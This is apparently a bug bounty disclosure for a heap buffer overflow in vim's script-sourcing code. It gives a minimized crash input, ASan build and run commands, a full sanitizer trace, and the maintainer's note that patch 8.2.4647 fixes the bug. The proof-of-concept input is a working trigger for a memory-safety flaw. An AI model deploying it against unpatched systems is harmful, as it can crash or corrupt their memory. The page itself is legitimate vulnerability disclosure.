heap buffer overflow in get_one_sourceline in vim/vim

Valid

Reported on

Mar 28th 2022


Description

When fuzzing vim commit 471b3aed3 I discovered a heap buffer overflow. I'm using ubuntu 20.04 with clang 13

Proof of Concept

Here is the minimized poc

norm300gr0
so

How to build

LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-ldl -fsanitize=address" ./configure --with-features=huge --enable-gui=none
make -j$(nproc)

Proof of Concept

Run crafted file with this command

./vim -u NONE -X -Z -e -s -S poc_utf_ptr2char -c :qa!

ASan stack trace:

aldo@vps:~/vim/src$ ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer ./vim -u NONE -X -Z -e -s -S poc_get_one_sourceline -c :qa!
=================================================================
==2393051==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000004c6c at pc 0x000000430f36 bp 0x7fffffff7e50 sp 0x7fffffff7610
READ of size 1 at 0x612000004c6c thread T0
    #0 0x430f35 in strlen (/home/aldo/vimtes/src/vim+0x430f35)
    #1 0xafb4c6 in get_one_sourceline /home/aldo/vimtes/src/scriptfile.c:1930:25
    #2 0xaf9a90 in getsourceline /home/aldo/vimtes/src/scriptfile.c:2051:9
    #3 0xaf71ee in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1615:17
    #4 0xaf4765 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1115:6
    #5 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
    #6 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
    #7 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
    #8 0xaf7435 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
    #9 0xaf4e80 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
    #10 0xaf49b9 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
    #11 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
    #12 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
    #13 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
    #14 0x6cadd0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
    #15 0xecacd4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
    #16 0xec8a09 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
    #17 0xec240d in main /home/aldo/vimtes/src/main.c:424:12
    #18 0x7ffff78240b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
    #19 0x41edcd in _start (/home/aldo/vimtes/src/vim+0x41edcd)

0x612000004c6c is located 0 bytes to the right of 300-byte region [0x612000004b40,0x612000004c6c)
allocated by thread T0 here:
    #0 0x499fa9 in realloc (/home/aldo/vimtes/src/vim+0x499fa9)
    #1 0x4cbea5 in ga_grow_inner /home/aldo/vimtes/src/alloc.c:741:10
    #2 0x4cbc33 in ga_grow /home/aldo/vimtes/src/alloc.c:720:9
    #3 0x4cc637 in ga_concat /home/aldo/vimtes/src/alloc.c:834:9
    #4 0xafb1a0 in get_one_sourceline /home/aldo/vimtes/src/scriptfile.c:1919:6
    #5 0xaf9a90 in getsourceline /home/aldo/vimtes/src/scriptfile.c:2051:9
    #6 0xaf71ee in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1615:17
    #7 0xaf4765 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1115:6
    #8 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
    #9 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
    #10 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
    #11 0xaf7435 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
    #12 0xaf4e80 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
    #13 0xaf49b9 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
    #14 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
    #15 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
    #16 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
    #17 0x6cadd0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
    #18 0xecacd4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
    #19 0xec8a09 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
    #20 0xec240d in main /home/aldo/vimtes/src/main.c:424:12
    #21 0x7ffff78240b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aldo/vimtes/src/vim+0x430f35) in strlen
Shadow bytes around the buggy address:
  0x0c247fff8930: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c247fff8940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c247fff8950: 00 00 00 00 00 00 00 00 00 00 00 00 00 05 fa fa
  0x0c247fff8960: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c247fff8970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c247fff8980: 00 00 00 00 00 00 00 00 00 00 00 00 00[04]fa fa
  0x0c247fff8990: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff89a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff89b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff89c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff89d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==2393051==ABORTING

💥 Impact

This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution

We are processing your report and will contact the vim team within 24 hours. 2 months ago
We have contacted a member of the vim team and are waiting to hear back 2 months ago
Bram Moolenaar validated this vulnerability 2 months ago
Muhammad Aldo Firmansyah has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bram Moolenaar
2 months ago

Maintainer


Fixed with patch 8.2.4647, using the POC for a test.

Bram Moolenaar confirmed that a fix has been merged on 2bdad6 2 months ago
Bram Moolenaar has been awarded the fix bounty
Muhammad
2 months ago

Researcher


Thanks

to join this conversation